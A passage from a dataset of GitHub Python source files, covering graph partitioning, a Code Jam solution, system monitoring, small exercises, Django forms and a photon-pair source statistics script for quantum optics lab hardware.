sort_len_dict = {k: v for k, v in sorted(len_dict.items(), key=lambda item: item[1], reverse=True)}\n owner_node_ids = {owner_id: [] for owner_id in range(num_clients)}\n owner_nodes_len = num_nodes // num_clients\n owner_list = [i for i in range(num_clients)]\n owner_ind = 0\n for group_i in sort_len_dict.keys():\n while len(owner_node_ids[owner_list[owner_ind]]) > owner_nodes_len:\n owner_list.remove(owner_list[owner_ind])\n owner_ind = owner_ind % len(owner_list)\n k = 0\n while len(owner_node_ids[owner_list[owner_ind]]) + len(partition_groups[group_i]) > owner_nodes_len + 1:\n k += 1\n owner_ind = (owner_ind + 1) % len(owner_list)\n if k == len(owner_list):\n owner_node_ids[owner_list[owner_ind]] += partition_groups[group_i]\n break\n owner_node_ids[owner_list[owner_ind]] += partition_groups[group_i]\n node_dict = owner_node_ids\n return node_dict\n\ndef structure_iid_sc(num_nodes,F,num_clients):\n S = torch.sigmoid(torch.mm(F, F.T))\n S = S.cpu().detach().numpy()\n clustering_lbls = spectral_clustering(affinity=S, n_clusters=num_clients)\n clustering_lbls = clustering_lbls.tolist()\n node_dict = {client_id: [] for client_id in range(num_clients)}\n for node_idx in range(num_nodes):\n node_dict[clustering_lbls[node_idx]].append(node_idx)\n return node_dict","repo_name":"xkLi-Allen/AdaFGL","sub_path":"datasets/structure_iid.py","file_name":"structure_iid.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23476406371","text":"filename = \"A-large\"\n\ndef contains_all_dig(set):\n if (len(set) == 10):\n return True\n else:\n return False\n\n\nwith open(filename + \".in\", \"r\") as input:\n with open(filename + \".out.txt\", \"w\") as output:\n for case_num in range(1, int(input.readline()) + 1) :\n output.write(\"Case #{}: \".format(case_num))\n starting_N = int(input.readline())\n if starting_N == 0:\n output.write(\"INSOMNIA\\n\")\n else:\n N = starting_N\n digit_set = set()\n while (not contains_all_dig(digit_set)):\n for char in str(N):\n digit_set.add(char)\n N += starting_N\n output.write(\"{}\\n\".format(N - starting_N))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_177/1176.py","file_name":"1176.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32342708116","text":"import threading\nimport time\nimport psutil\nimport pandas as pd\n\n\ndef get_cpu_temp(date, time_list, queuee):\n while True:\n time.sleep(60)\n date.append(psutil.cpu_stats().ctx_switches)\n time_list.append(f\"{time.localtime().tm_hour}:{time.localtime().tm_min}:{time.localtime().tm_sec}\")\n queuee.append(\"Число переключений контекста\")\n\n\ndef memory(mem_date, time_list, queuee):\n while True:\n time.sleep(60)\n mem_date.append(psutil.virtual_memory().percent)\n time_list.append(f\"{time.localtime().tm_hour}:{time.localtime().tm_min}:{time.localtime().tm_sec}\")\n queuee.append(\"Процент использования памяти, проценты\")\n\n\ndef collecter(work_time: float):\n time_list = []\n\n date = []\n queuee = []\n t1 = threading.Thread(target=get_cpu_temp, args=(date, time_list, queuee,), daemon=True)\n t2 = threading.Thread(target=memory, args=(date, time_list, queuee,), daemon=True)\n\n t1.start()\n t2.start()\n\n delta = 0\n start_time = time.time()\n while (delta <= work_time):\n delta = time.time() - start_time\n\n t1.join(0.1)\n t2.join(0.1)\n\n print(time_list)\n 
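collecter in threadss.py above busy-waits on time.time() to keep the main thread alive while daemon samplers append a reading every 60 seconds. A threading.Event folds the sleep and the shutdown signal into one interruptible primitive (a sketch of the pattern, not the script's interface):

import threading
import time

stop = threading.Event()

def sampler(out, interval=60):
    # Event.wait doubles as a sleep that can be cancelled by stop.set()
    while not stop.wait(interval):
        out.append(time.time())

readings = []
threading.Thread(target=sampler, args=(readings,), daemon=True).start()
time.sleep(125)   # the collection window
stop.set()        # samplers exit cleanly on their next wake-up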
print(queuee)\n print(date)\n\n table = pd.DataFrame({\"Время\": time_list, \"Процесс\": queuee, \"Данные\": date})\n table.to_csv(\"table.csv\", sep=\";\")\n\nif __name__ == '__main__':\n collecter(125)","repo_name":"Nastya31/new_git","sub_path":"threadss.py","file_name":"threadss.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20065663916","text":"print('PAR OU ÍMPAR')\n\ntotal = 0\npar = 0\nvalor = float(input('Digite um valor: '))\n\nwhile valor != 1000:\n if (valor % 2) == 0:\n print('Esse número é par!\\nDigite \"1000\" para encerrar!')\n par = par + 1\n total = total + 1\n else:\n print('Esse número é ímpar!\\nDigite \"1000\" para encerrar!')\n total = total + 1\n valor = float(input('Digite um valor: '))\n\nprint(f'O total de números digitados foi {total}\\nO total de números pares digitados foi {par}')\nprint('PROGRAMA ENCERRADO!')","repo_name":"FilipeHanniel/guppe","sub_path":"Exerc_sec_06/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17225949151","text":"# Given an integer array nums of length n and an integer target, find three integers in nums such that the sum is closest to target.\n\n# Return the sum of the three integers.\n\n# You may assume that each input would have exactly one solution.\n\n# Example 1:\n\n# Input: nums = [-1,2,1,-4], target = 1\n# Output: 2\n# Explanation: The sum that is closest to the target is 2. (-1 + 2 + 1 = 2).\n# Example 2:\n\n# Input: nums = [0,0,0], target = 1\n# Output: 0\n \n# Constraints:\n\n# 3 <= nums.length <= 1000\n# -1000 <= nums[i] <= 1000\n# -104 <= target <= 104\n\nclass Solution:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n min_diff = float('inf')\n min_sum = None\n n = len(nums)\n \n nums.sort()\n \n for i in range(n - 2):\n left_pointer = i + 1\n right_pointer = n - 1\n \n while left_pointer != right_pointer:\n current_sum = nums[i] + nums[left_pointer] + nums[right_pointer]\n # print(str(nums[i]) + ' ' + str(nums[left_pointer]) + ' ' + str(nums[right_pointer]))\n diff_target = abs(target - current_sum)\n # print(diff_target)\n if diff_target < min_diff:\n min_diff = diff_target\n min_sum = current_sum\n \n if current_sum < target:\n left_pointer += 1\n else:\n right_pointer -= 1\n \n return min_sum","repo_name":"angelricardoh/LeetCode-Python","sub_path":"Three Sum Closest.py","file_name":"Three Sum Closest.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38331952769","text":"from django import forms\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Submit, Row, Column, HTML\n\nfrom django.forms.models import inlineformset_factory\nfrom django_superform.forms import SuperModelFormMixin\nfrom django_superform import InlineFormSetField\n\nfrom language_tags import data as language_data\nregistry = language_data.get('registry')\n\nfrom django_select2 import forms as s2forms\n\nfrom . import models\n\n\nclass ModelFormWithInlineFormsetMixin(object):\n '''\n Allow nested forms to be automatically saved.\n\n If a form containing an InlineFormset is dynamically created on the\n client the forms in the formset will not have an id of their parent\n (because it doesn't have one yet). 
This means that we first need to save\n the parent form and only then the child form can be saved. However, by\n default, the forms first saves its children, and only then saves the\n parent. This is why this class has to be used to save children an\n additional time after the parent has been saved.\n\n Deleted forms should not be saved, since their instance would already be\n deleted by super().save().\n\n Taken from https://github.com/Chirurgus/cookbox\n '''\n\n def save(self, commit=True):\n '''\n (Re)saves the related formsets, so that newly created\n nested formsets are also saved.\n '''\n # Save the parent\n ret = super().save(commit)\n if hasattr(self, 'formsets'):\n for formset in self.formsets.values():\n for form in formset.forms:\n if not form in formset.deleted_forms:\n form.save(commit)\n return ret\n\n\nclass SuperModelForm( ModelFormWithInlineFormsetMixin, SuperModelFormMixin, forms.ModelForm ):\n pass\n\n\ndef submit_buttons():\n return Row( \n Submit(\"submit\", \"Save\"), \n HTML('Cancel'),\n )\n\n\nclass RepositoryForm(forms.ModelForm):\n class Meta:\n fields = \"__all__\"\n model = models.Repository\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n \"identifier\",\n \"url\",\n Row(Column(\"location_description\"), Column(\"settlement\"), css_class='form-row'),\n Row(Column(\"latitude\"), Column(\"longitude\"), css_class='form-row'),\n submit_buttons(),\n )\n\nlanguage_subtag_choices = sorted( \n [(language['Subtag'],language['Description'][0]) for language in filter(lambda x: x['Type'] == \"language\", registry) ],\n key=lambda x: x[1],\n)\n\n\n\nclass ChoiceWidget(s2forms.Select2Widget):\n def build_attrs(self, base_attrs, extra_attrs=None):\n base_attrs = super().build_attrs(base_attrs, extra_attrs)\n base_attrs.update(\n {\n \"data-minimum-input-length\": 0, \n \"data-placeholder\": self.empty_label,\n # \"data-theme\": \"bootstrap4\",\n }\n )\n return base_attrs\n\n @property\n def media(self):\n media = super().media\n \n js = [x if x != \"django_select2/django_select2.js\" else \"kutub/js/django_select2.js\" for x in list(media._js)]\n css = dict(media._css)\n css['screen'] += [\"https://cdn.jsdelivr.net/npm/@ttskch/select2-bootstrap4-theme/dist/select2-bootstrap4.min.css\"]\n return forms.Media(\n css=css,\n js=js,\n )\n\n\nclass LanguageForm(forms.ModelForm):\n class Meta:\n fields = \"__all__\"\n model = models.Language\n widgets = {\n \"language_subtag\": ChoiceWidget,\n \"extlang\": ChoiceWidget,\n \"script\": ChoiceWidget,\n \"region\": ChoiceWidget,\n }\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Row(Column(\"description\"), css_class='form-row'),\n Row(Column(\"language_subtag\"), Column(\"extlang\"), css_class='form-row'),\n Row(Column(\"script\"), Column(\"region\"), css_class='form-row'),\n submit_buttons(),\n )\n\n\nclass LanguageWidget(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n \"description__icontains\",\n ]\n\n def build_attrs(self, base_attrs, extra_attrs=None):\n base_attrs = super().build_attrs(base_attrs, extra_attrs)\n base_attrs.update(\n {\n \"data-minimum-input-length\": 0, \n \"data-placeholder\": self.empty_label,\n \"theme\": \"bootstrap4\",\n }\n )\n return base_attrs\n\n\nclass ContentItemForm(SuperModelForm):\n class Meta:\n model = models.ContentItem\n fields = \"__all__\"\n widgets = {\n \"other_languages\": LanguageWidget,\n 
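ContentItemForm above feeds the inline formset built immediately below with inlineformset_factory (Manuscript as parent). Wiring such a formset into a view follows the stock Django pattern; the view name, URL name and template path here are hypothetical, not taken from this app:

from django.shortcuts import get_object_or_404, redirect, render

def edit_manuscript(request, pk):
    manuscript = get_object_or_404(models.Manuscript, pk=pk)
    formset = ContentItemFormSet(request.POST or None, instance=manuscript)
    if request.method == 'POST' and formset.is_valid():
        formset.save()   # the parent already has a pk, so children save cleanly
        return redirect('manuscript-detail', pk=pk)
    return render(request, 'kutub/manuscript_form.html', {'formset': formset})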
}\n\n\nContentItemFormSet = inlineformset_factory(\n model=models.ContentItem,\n parent_model=models.Manuscript,\n form=ContentItemForm,\n extra=0,\n can_delete=True\n)\n\n\nclass ManuscriptForm(SuperModelForm):\n content_items = InlineFormSetField(formset_class=ContentItemFormSet)\n\n class Meta:\n fields = \"__all__\"\n model = models.Manuscript\n widgets = {\n \"other_languages\": LanguageWidget,\n }\n","repo_name":"rbturnbull/kutub","sub_path":"kutub/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74298522754","text":"#!/usr/bin/env python3\n\"\"\"Simple script to continuously feed pair source optimization statistics\n\nPython port of 'inst_efficiency.sh' functionality written in CQT.\nSupports reading of singles, pairs, and other miscellaneous features.\nInterface via CLI only, to avoid unnecessary GUI dependencies.\n\nSupports usage of 'inst_efficiency.py' both as a script,\nas well as an importable library for specific function usage, e.g. 'read_log'.\n\nConfiguration files can be supplied according to parser specification, which\ncan be viewed by supplying the '--help' flag.\n\nUsage:\n\n 1. View available configuration options\n\n ./inst_efficiency.py --help\n\n\n 2. TTL input pulses with 2s integration time\n\n ./inst_efficiency.py singles \\\n -U /dev/ioboards/usbtmst1 \\\n -S /home/sfifteen/programs/usbtmst4/apps/readevents7 \\\n --threshvolt 1 \\\n --integration_time 2\n\n\n 3. Search for pairs between detector channels 1 and 2, over +/-250ns,\n showing histogram of coincidences for each dataset\n\n ./inst_efficiency.py pairs -qH --channel_start 1 --channel_stop 2\n\n\n 4. Calculate total pairs located at +118ns delay, within a 2ns-wide\n coincidence window spanning +117ns to +118ns, with only 20 bins\n\n ./inst_efficiency.py pairs -q --peak 118 --left=-1 --right=0 --bins 20\n\n\n 5. Log measurements into a file\n\n ./inst_efficiency.py pairs -q --logging pair_measurements\n\n\n 6. Save configuration from (4) into default config file\n\n ./inst_efficiency.py pairs -q --peak 118 -L=-1 -R 0 --bins 20 \\\n --save ./inst_efficiency.py.default.conf\n\n\n 7. Load multiple configuration\n\n > cat ./inst_efficiency.py.default.conf\n bins = 10\n peak = 200\n\n > cat ./asympair\n peak = 118\n integration_time = 2\n\n # Output yields 'bins=10', 'peak=118', 'integration_time=3'\n ./inst_efficiency.py pairs -c asympair --time 3\n\n\nAuthor:\n Justin, 2022-12-01\n\nNote:\n Configuration specification follows the philosophy of ConfigArgParse[1].\n Previous idea to use extensible sections (via overriding of profiles),\n but its utility typically only applies up to three layers, in increasing\n precedence, i.e.\n\n 1. Default (platform-specific, e.g. TTL inputs)\n 2. Profile (setup-specific, e.g. specific delays)\n 3. Sub-profile (setup-specific variations, e.g. longer integration)\n\n This can be mapped into the respective ConfigArgParse input methods:\n\n 1. Default configuration file (i.e. 'inst_efficiency.py.default.conf')\n 2. Specified configuration file (via '--config' option)\n 3. 
Command line arguments, with highest precedence\n\nReferences:\n [1] https://github.com/bw2/ConfigArgParse\n\"\"\"\n\nimport datetime as dt\nimport logging\nimport pathlib\nimport re\nimport sys\nimport time\nfrom itertools import product\n\nimport configargparse\nimport numpy as np\nimport tqdm\n\nfrom S15lib.g2lib import g2lib as g2\nfrom S15lib.instruments import LCRDriver, TimestampTDC2\n\n# Constants\nINT_MIN = np.iinfo(np.int64).min # indicate invalid value in int64 array\nRE_ANSIESCAPE = re.compile(r\"\\x1B(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~])\")\n\n# Colorama\nCOLORAMA_IMPORTED = False\ntry:\n import colorama\n\n COLORAMA_IMPORTED = True\n try:\n colorama.just_fix_windows_console()\n COLORAMA_INIT = False\n except AttributeError:\n colorama.init()\n COLORAMA_INIT = True\nexcept ModuleNotFoundError:\n pass # colorama does not exist, disable coloring\n\n\ndef style(text, fg=None, bg=None, style=None, clear=False, up=0):\n \"\"\"Returns text with ANSI wrappers for each line.\n\n Special note on newlines, where lines are broken up to apply\n formatting on individual lines, excluding the newline character.\n\n Position of start of print can be controlled using the 'up' arg.\n\n Usage:\n >>> print(s(\"hello\\nworld\", fg=\"red\", style=\"dim\"))\n hello\n world\n \"\"\"\n # Construct formatting\n fmt = \"\"\n for c, cls in zip((fg, bg), (colorama.Fore, colorama.Back)):\n if c:\n c = c.upper()\n if c.startswith(\"LIGHT\"):\n c += \"_EX\"\n fmt += getattr(cls, c)\n if style:\n fmt += getattr(colorama.Style, style.upper())\n\n # Force clear lines\n if clear:\n fmt = colorama.ansi.clear_line() + fmt\n\n # Break by individual lines to apply formatting\n lines = str(text).split(\"\\n\")\n lines = [f\"{fmt}{line}{colorama.Style.RESET_ALL}\" for line in lines]\n text = \"\\n\".join(lines)\n\n # Apply move and restore position\n # Assuming Cursor.DOWN will stop at bottom of current terminal printing\n # Non-positive numbers are treated strangely.\n if up > 0:\n text = colorama.Cursor.UP(up) + text + colorama.Cursor.DOWN(up)\n return text\n\n\ndef strip_ansi(text):\n return RE_ANSIESCAPE.sub(\"\", text)\n\n\ndef len_ansi(text):\n \"\"\"Returns length after removing ANSI codes.\"\"\"\n return len(strip_ansi(text))\n\n\ndef _request_filecomment(comment_cache=\".inst_efficiency.comment\") -> pathlib.Path:\n \"\"\"Request for comments to append to logfile and returns path to logfile.\"\"\"\n\n # If logging is enabled, request for filename\n # Search for any cached comments from previous runs\n path_comment = pathlib.Path(comment_cache)\n if path_comment.is_file():\n with open(path_comment, \"r\") as f:\n comment = f.read()\n else:\n comment = \"\" # default\n\n # Request for new comment from user, reassign only if issued\n _comment = re.sub(\" \", \"_\", input(f\"Enter comment [{comment}]: \"))\n if _comment:\n comment = _comment\n\n # Check writable to location\n path_logfile = _append_datetime_logfile(comment)\n with open(path_logfile, \"a\") as f:\n f.write(\"\")\n with open(path_comment, \"w\") as f:\n f.write(comment)\n\n return path_logfile\n\n\ndef _append_datetime_logfile(comment):\n return dt.datetime.now().strftime(f\"%Y%m%d_inst_efficiency_{comment}.log\")\n\n\ndef print_fixedwidth(*values, width=7, out=None, pbar=None, end=\"\\n\"):\n \"\"\"Prints right-aligned columns of fixed width.\n\n Note:\n The default column width of 7 is predicated on the fact that\n 10 space-separated columns can be comfortably squeezed into a\n 80-width terminal (with an extra buffer for newline depending\n on the 
shell).\n \"\"\"\n row = []\n for value in values:\n if value == INT_MIN:\n row.append(\" \" * width)\n else:\n # Measure length with ANSI control chars removed\n value = str(value)\n slen = max(0, width - len_ansi(value))\n row.append(\" \" * slen + value)\n line = \" \".join(row)\n\n if pbar:\n pbar.set_description(line)\n else:\n print(line, end=end)\n if out:\n line = \" \".join(\n [\n f\"{strip_ansi(str(value)) if value != INT_MIN else ' ': >{width}s}\"\n for value in values\n ]\n )\n with open(out, \"a\") as f:\n f.write(line + \"\\n\")\n\n\ndef read_log(filename: str, schema: list, merge: bool = False):\n \"\"\"Parses a logfile into a dictionary of columns.\n\n Convenience method to read out logfiles generated by the script.\n This is not filename-aware (i.e. date and schema version is not\n extracted from the filename) since these are not rigorously\n set-in-stone yet.\n\n Args:\n filename: Filename of log file.\n schema: List of datatypes to parse each column in logfile.\n merge:\n Whether multiple logging runs in the same file should\n be merged into a single list, or as a list-of-lists.\n\n Note:\n This code assumes tokens in columns do not contain spaces,\n including headers.\n\n TODO(Justin):\n Consider usage of PEP557 dataclasses for type annotations.\n Change the argument type of filename to include Path-like objects.\n Implement non-merge functionality.\n \"\"\"\n\n # Custom datatype\n def convert_time(s):\n \"\"\"Converts time in HHMMSS format to datetime object.\n\n Note:\n The default date is 1 Jan 1900.\n \"\"\"\n return dt.datetime.strptime(s, \"%H%M%S\")\n\n # Parse schema\n _maps = []\n for dtype in schema:\n # Parse special (hardcoded) types\n if isinstance(dtype, str):\n if dtype == \"time\":\n _map = convert_time\n else:\n raise ValueError(f\"Unrecognized schema value - '{dtype}'\")\n # Treat everything else as regular Python datatypes\n elif isinstance(dtype, type):\n _map = dtype\n else:\n raise ValueError(f\"Unrecognized schema value - '{dtype}'\")\n _maps.append(_map)\n\n # Read file\n is_header_logged = False\n _headers = []\n _data = []\n with open(filename, \"r\") as f:\n for row_str in f:\n # Squash all intermediate spaces\n row = re.sub(r\"\\s+\", \" \", row_str.strip()).split(\" \")\n try:\n # Equivalent to Pandas's 'applymap'\n row = [f(v) for f, v in zip(_maps, row)]\n _data.append(row)\n except Exception:\n # If fails, assume is string header\n if not is_header_logged:\n _headers = row\n is_header_logged = True\n\n if not is_header_logged:\n raise ValueError(\"Logfile does not contain a header.\")\n\n # Merge headers\n _data = np.array(list(zip(*_data))) # type: ignore\n _items = tuple(zip(_headers, _data)) # type: ignore\n return dict(_items)\n\n\n#############\n# SCRIPTS #\n#############\n\n# Collect program names\nPROGRAMS = {}\n\n\ndef _collect_as_script(alias=None):\n \"\"\"Decorator to dynamically collect functions for use as scripts.\"\"\"\n\n def collector(f):\n nonlocal alias\n if alias is None:\n alias = f.__name__\n PROGRAMS[alias] = f\n return f\n\n return collector\n\n\ndef read_pairs(params):\n \"\"\"Compute single pass pair statistics.\n\n Note:\n Parameter dictionary passed instead of directly into kwargs, since:\n 1. Minimize dependency with parser argument names\n 2. Functions in the stack can reuse arguments,\n e.g. 
monitor_pairs -> read_pairs\n \"\"\"\n\n # Unpack arguments into aliases\n bin_width = params[\"bin_width\"]\n bins = params[\"bins\"]\n peak = params[\"peak\"]\n roffset = params[\"window_right_offset\"]\n loffset = params[\"window_left_offset\"]\n duration = params[\"integration_time\"]\n darkcounts = [\n params[\"darkcount_ch1\"],\n params[\"darkcount_ch2\"],\n params[\"darkcount_ch3\"],\n params[\"darkcount_ch4\"],\n ]\n channel_start = params[\"channel_start\"] - 1\n channel_stop = params[\"channel_stop\"] - 1\n timestamp = params[\"timestamp\"]\n\n darkcount_start = darkcounts[channel_start]\n darkcount_stop = darkcounts[channel_stop]\n window_size = roffset - loffset + 1\n acc_start = max(bins // 2, 1) # location to compute accidentals\n while True:\n\n # Invoke timestamp data recording\n timestamp._call_with_duration([\"-a1\", \"-X\"], duration=duration)\n\n # Extract g2 histogram and other data\n data = g2.g2_extr(\n \"/tmp/quick_timestamp\",\n channel_start=channel_start,\n channel_stop=channel_stop,\n highres_tscard=True,\n bin_width=bin_width,\n bins=bins,\n # Include window at position 1\n min_range=peak + loffset - 1,\n )\n hist = data[0]\n s1, s2 = data[2:4]\n inttime = data[4] * 1e-9 # convert to units of seconds\n\n # Integration time check for data validity\n if not (0.75 < inttime / duration < 2):\n continue\n\n # Calculate statistics\n acc = window_size * np.mean(hist[acc_start:])\n pairs = sum(hist[1 : 1 + window_size]) - acc\n\n # Normalize to per unit second\n s1 = s1 / inttime - darkcount_start # timestamp data more precise\n s2 = s2 / inttime - darkcount_stop\n pairs = pairs / inttime\n acc = acc / inttime\n\n if s1 == 0 or s2 == 0:\n e1 = e2 = eavg = 0\n else:\n e1 = 100 * pairs / s2\n e2 = 100 * pairs / s1\n eavg = 100 * pairs / (s1 * s2) ** 0.5\n\n # Single datapoint collection completed\n break\n\n return hist, inttime, pairs, acc, s1, s2, e1, e2, eavg\n\n\n@_collect_as_script(\"pairs_once\")\ndef print_pairs(params):\n \"\"\"Pretty printed variant of 'read_pairs', showing pairs, acc, singles.\"\"\"\n _, _, pairs, acc, s1, s2, _, _, _ = read_pairs(params)\n print_fixedwidth(\n round(pairs, 1),\n round(acc, 1),\n int(s1),\n int(s2),\n width=0,\n )\n\n\n@_collect_as_script(\"pairs\")\ndef monitor_pairs(params):\n \"\"\"Prints out pair source statistics, between ch1 and ch4.\"\"\"\n # Unpack arguments into aliases\n peak = params[\"peak\"]\n roffset = params[\"window_right_offset\"]\n loffset = params[\"window_left_offset\"]\n enable_hist = params.get(\"histogram\", False)\n disable_hist = params.get(\"no_histogram\", False)\n logfile = params.get(\"logfile\", None)\n\n is_header_logged = False\n i = 0\n is_initialized = False\n prev = None\n longterm_data = {\"count\": 0, \"inttime\": 0, \"pairs\": 0, \"acc\": 0, \"s1\": 0, \"s2\": 0}\n while True:\n\n hist, inttime, pairs, acc, s1, s2, e1, e2, eavg = read_pairs(params)\n\n # Visualize g2 histogram\n HIST_ROWSIZE = 10\n if not is_initialized or enable_hist:\n is_initialized = True\n a = np.array(hist, dtype=np.int64)\n # Append NaN values until fits number of rows\n a = np.append(a, np.resize(INT_MIN, HIST_ROWSIZE - (a.size % HIST_ROWSIZE)))\n if not disable_hist:\n print(\"\\nObtained histogram:\")\n for row in a.reshape(-1, HIST_ROWSIZE):\n print_fixedwidth(*row)\n peakvalue = max(a)\n peakargmax = np.argmax(a)\n peakpos = peakargmax + peak + loffset - 1\n print(f\"Maximum {peakvalue} @ index {peakpos}\")\n\n # Display current window as well\n window_size = roffset - loffset + 1\n print(f\"Current window: 
{list(hist[1:window_size+1])}\")\n\n # Display likely window\n likely_window = [peakvalue]\n likely_left = None\n likely_right = None\n acc_bin = acc / window_size\n # Scan below\n i = 0\n while True:\n i += 1\n pos = peakargmax - i\n value = a[pos]\n if value > 2 * acc_bin:\n likely_window = [value] + likely_window\n else:\n likely_left = -(i - 1)\n break\n i = 0\n while True:\n i += 1\n pos = peakargmax + i\n value = a[pos]\n if value > 2 * acc_bin:\n likely_window = likely_window + [value]\n else:\n likely_right = i - 1\n break\n print(\n \"Likely window: \"\n f\"{list(a[likely_left+peakargmax:likely_right+1+peakargmax])}\"\n )\n print(\n f\"Args: --peak={peakpos} --left={likely_left} --right={likely_right}\\n\"\n )\n\n # Print the header line after every 10 lines\n if i == 0 or enable_hist:\n i = 10\n print_fixedwidth(\n \"TIME\",\n \"ITIME\",\n \"PAIRS\",\n \"ACC\",\n \"SINGLE1\",\n \"SINGLE2\",\n \"EFF1\",\n \"EFF2\",\n \"EFF_AVG\",\n out=logfile if not is_header_logged else None,\n )\n is_header_logged = True\n i -= 1\n\n # Print statistics\n print_fixedwidth(\n style(dt.datetime.now().strftime(\"%H%M%S\"), style=\"dim\"),\n round(inttime, 1),\n style(int(pairs), style=\"bright\"),\n round(acc, 1),\n style(int(s1), fg=\"yellow\", style=\"bright\"),\n style(int(s2), fg=\"green\", style=\"bright\"),\n round(e1, 1),\n round(e2, 1),\n style(round(eavg, 1), fg=\"cyan\", style=\"bright\"),\n out=logfile,\n )\n\n # Print long-term statistics, only if value supplied\n if params[\"averaging_time\"] > 0:\n # Update first\n longterm_data[\"count\"] += 1\n longterm_data[\"inttime\"] += inttime\n longterm_data[\"pairs\"] += pairs\n longterm_data[\"acc\"] += acc\n longterm_data[\"s1\"] += s1\n longterm_data[\"s2\"] += s2\n\n # Cache long term results if reach threshold\n if longterm_data[\"inttime\"] >= params[\"averaging_time\"]:\n counts = longterm_data[\"count\"]\n inttime = longterm_data[\"inttime\"]\n p = longterm_data[\"pairs\"] / counts\n acc = longterm_data[\"acc\"] / counts\n s1 = longterm_data[\"s1\"] / counts\n s2 = longterm_data[\"s2\"] / counts\n prev = (\n dt.datetime.now().strftime(\"%H%M%S\"),\n round(inttime, 1),\n style(int(round(p, 0)), fg=\"red\", style=\"bright\"),\n round(acc, 1),\n int(round(s1, 0)),\n int(round(s2, 0)),\n round(100 * p / s2, 1),\n round(100 * p / s1, 1),\n style(\n round(100 * p / (s1 * s2) ** 0.5, 1), fg=\"red\", style=\"bright\"\n ),\n )\n longterm_data = {\n \"count\": 0,\n \"inttime\": 0,\n \"pairs\": 0,\n \"acc\": 0,\n \"s1\": 0,\n \"s2\": 0,\n }\n\n # Print if exists\n if prev:\n print_fixedwidth(*prev, end=\"\\r\")\n\n\n@_collect_as_script(\"singles\")\ndef monitor_singles(params):\n \"\"\"Prints out singles statistics.\"\"\"\n # Unpack arguments into aliases\n duration = params[\"integration_time\"]\n darkcount_ch1 = params[\"darkcount_ch1\"]\n darkcount_ch2 = params[\"darkcount_ch2\"]\n darkcount_ch3 = params[\"darkcount_ch3\"]\n darkcount_ch4 = params[\"darkcount_ch4\"]\n timestamp = params[\"timestamp\"]\n logfile = params.get(\"logfile\", None)\n enable_avg = params.get(\"averaging\", False)\n\n is_header_logged = False\n i = 0\n avg = np.array([0, 0, 0, 0]) # averaging facility, e.g. 
for measuring dark counts\n avg_iters = 0\n while True:\n\n # Invoke timestamp data recording\n data = timestamp.get_counts(\n duration=duration,\n return_actual_duration=True,\n )\n counts = data[:4]\n inttime = data[4]\n\n # Rough integration time check\n if not (0.75 < inttime / duration < 2):\n continue\n if any(np.array(counts) < 0):\n continue\n\n counts = (\n counts[0] - darkcount_ch1 * inttime,\n counts[1] - darkcount_ch2 * inttime,\n counts[2] - darkcount_ch3 * inttime,\n counts[3] - darkcount_ch4 * inttime,\n )\n counts = np.array(counts)\n # VAHD\n # counts = counts/ np.array([1,1.057,0.788,0.631])\n # VDHA\n # counts = counts/ np.array([1,0.631,0.788,1.057])\n\n # Implement rolling average to avoid overflow\n if enable_avg:\n avg_iters += 1\n avg = (avg_iters - 1) / avg_iters * avg + np.array(counts) / avg_iters\n counts = np.round(avg, 1)\n\n # Print the header line after every 10 lines\n if i == 0:\n i = 10\n print_fixedwidth(\n \"TIME\",\n \"CH1\",\n \"CH2\",\n \"CH3\",\n \"CH4\",\n \"TOTAL\",\n out=logfile if not is_header_logged else None,\n )\n is_header_logged = True\n i -= 1\n\n # Print statistics\n print_fixedwidth(\n style(dt.datetime.now().strftime(\"%H%M%S\"), style=\"dim\"),\n *list(map(int, counts)),\n style(int(sum(counts)), style=\"bright\"),\n out=logfile,\n )\n\n\n@_collect_as_script(\"lcvr\")\ndef scan_lcvr_singles(params):\n timestamp = params[\"timestamp\"]\n target = dt.datetime.now().strftime(\"%Y%m%d_%H%M%S_lcvrsingles.log\")\n lcvr = LCRDriver(\n \"/dev/serial/by-id/\"\n \"usb-Centre_for_Quantum_Technologies_Quad_LCD_driver_QLC-QO05-if00\"\n )\n lcvr.all_channels_on()\n\n voltages = np.round(np.linspace(0.9, 5.5, 9), 3)\n combinations = product(voltages, repeat=4)\n\n pbar = tqdm.tqdm(combinations)\n for combination in pbar:\n\n # Set LCVR values\n lcvr.V1, lcvr.V2, lcvr.V3, lcvr.V4 = combination\n time.sleep(0.1)\n\n # Invoke timestamp data recording\n counts = timestamp.get_counts()\n counts = (\n counts[0],\n counts[1],\n counts[2],\n counts[3],\n )\n\n # Print statistics\n print_fixedwidth(\n dt.datetime.now().strftime(\"%H%M%S\"),\n *combination,\n *counts,\n out=target,\n pbar=pbar,\n )\n\n\n##########################\n# PRE-SCRIPT EXECUTION #\n##########################\n\n# Enumerate data processing arguments\nARGUMENTS = [\n \"bin_width\",\n \"bins\",\n \"peak\",\n \"window_left_offset\",\n \"window_right_offset\",\n \"integration_time\",\n \"averaging_time\",\n \"darkcount_ch1\",\n \"darkcount_ch2\",\n \"darkcount_ch3\",\n \"darkcount_ch4\",\n \"channel_start\",\n \"channel_stop\",\n]\n\nif __name__ == \"__main__\":\n # Request python-black linter to avoid parsing, for readability\n # fmt: off\n 